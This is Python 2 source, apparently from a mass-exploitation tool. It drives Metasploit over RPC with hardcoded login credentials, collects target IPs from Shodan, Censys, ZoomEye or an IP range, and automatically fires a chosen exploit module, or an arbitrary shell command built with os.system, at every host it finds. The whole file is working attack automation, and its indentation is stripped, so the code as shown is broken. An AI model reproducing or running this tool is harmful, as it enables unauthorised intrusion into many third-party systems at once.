class MyMsf(object):
def __init__(self):
self.client = msfrpc.Msfrpc({})
self.console_id = None
self.query = None
self.search = None
self.page = 10
self.STOP_ME = [False]
self.queue = Queue()
self.module = None
self.moduleType = None
self.opts = {}
def login(self):
"""Login the msf client"""
self.client.login('msf', 'abc123')
def get_console(self):
"""Get a console"""
console = self.client.call('console.create')
self.console_id = console['id']
welcome = self.client.call('console.read', [self.console_id])
return welcome
def send_command(self, command, search, thread_num, exec_cmd, startIP, endIP, ipfile):
"""Execute a command"""
if search == "censys":
self.search = Censys()
elif search == "zoomeye":
self.search = Zoomeye()
elif search == "shodan":
self.search = Shodan()
elif search == "local":
self.search = Local()
else:
print "you got a wrong type of search engine, you can select censys, shodan or zoomeye as your scan engine."
sys.exit()
if self.setQuery(command):
return {'prompt': '', 'busy': False, 'data': 'QUERY => %s\n' % self.query}
elif self.setPage(command):
return {'prompt': '', 'busy': False, 'data': 'PAGE => %d\n' % self.page}
else:
if command == "exploit\n" or command == "run\n":
if not self.search:
print "please select a search engine using the -s or --search option."
sys.exit()
if (self.module and self.moduleType) or exec_cmd:
if (startIP and endIP) or ipfile:
args = (self.queue, self.STOP_ME, startIP, endIP, ipfile)
else:
if self.query:
self.search.getConfig()
args = (self.query, self.page, self.queue, self.STOP_ME)
else:
return {'prompt': '', 'busy': False, 'data': 'QUERY must be setted\n'}
threads = []
t1 = threading.Thread(target = self.search.searchIP, args = args)
threads.append(t1)
t2 = threading.Thread(target=self.DoExploit, args=(exec_cmd, command, thread_num))
threads.append(t2)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
result = {'prompt': '', 'busy': False, 'data': '\n'}
else:
return {'prompt': '', 'busy': False, 'data': 'please select the module\n'}
else:
isSuccess = self.client.call('console.write', [self.console_id, command])
if isSuccess.has_key('error'):
self.login()
self.client.call('console.write', [self.console_id, command])
sleep(0.5)
result = self.client.call('console.read', [self.console_id])
while result['busy']:
if result['data']:
print result['data']
sleep(0.5)
result = self.client.call('console.read', [self.console_id])
if command == "show options\n":
if exec_cmd:
result['data'] = "%s command %s\n" % (result['data'], exec_cmd)
result['data'] = "%s QUERY %s\n" % (result['data'], self.query)
result['data'] = "%s PAGE %s\n" % (result['data'], self.page)
if command.startswith("use"):
module = command.split(' ')[1].strip()
self.moduleType = module[:module.find('/')]
self.module = module[module.find('/')+1:]
if command.startswith("set"):
options = command.split(' ')
self.opts[options[1]] = options[2].strip()
return result
def setQuery(self, command):
r_query = r"set query (.+?)\n"
query = re.search(r_query, command, re.I)
if query:
self.query = query.groups()[0]
return True
else:
return False
def setPage(self, command):
r_page = r"set page (\d+)\n"
page = re.search(r_page, command, re.I)
if page:
self.page = int(page.groups()[0])
return True
else:
return False
def DoExploit(self, exec_cmd, command, thread_num):
while not self.STOP_ME[0]:
while not self.queue.empty():
ip = self.queue.get()
result_str = ""
if exec_cmd:
os.system(exec_cmd % ip)
else:
while len(self.client.call('job.list', [])) >= thread_num:
sleep(1)
self.isTimeout(self.client.call('job.list', []))
self.opts['RHOSTS'] = ip
self.opts['RHOST'] = ip
print "detecting %s" % ip
opts = self.client.call('module.execute', [self.moduleType, self.module, self.opts])
while self.client.call('job.list', []):
sleep(1)
self.isTimeout(self.client.call('job.list', []))
print "Done!\n"
print "using creds, services, vulns .etc commands to see specific informations,\ntype help to see the details."
def isTimeout(self, job_list):
for job_id in job_list.keys():
try:
job_info = self.client.call('job.info', [int(job_id),])
except:
self.login()
job_info = self.client.call('job.info', [int(job_id),])
if job_info.has_key('error_message') and job_info['error_message'] == 'Invalid Job':
continue
elif job_info.has_key('error'):
print job_info['error_message']
sys.exit()
used_time = time() - job_info['start_time']
if used_time > 60:
self.client.call('job.stop', [int(job_id),])
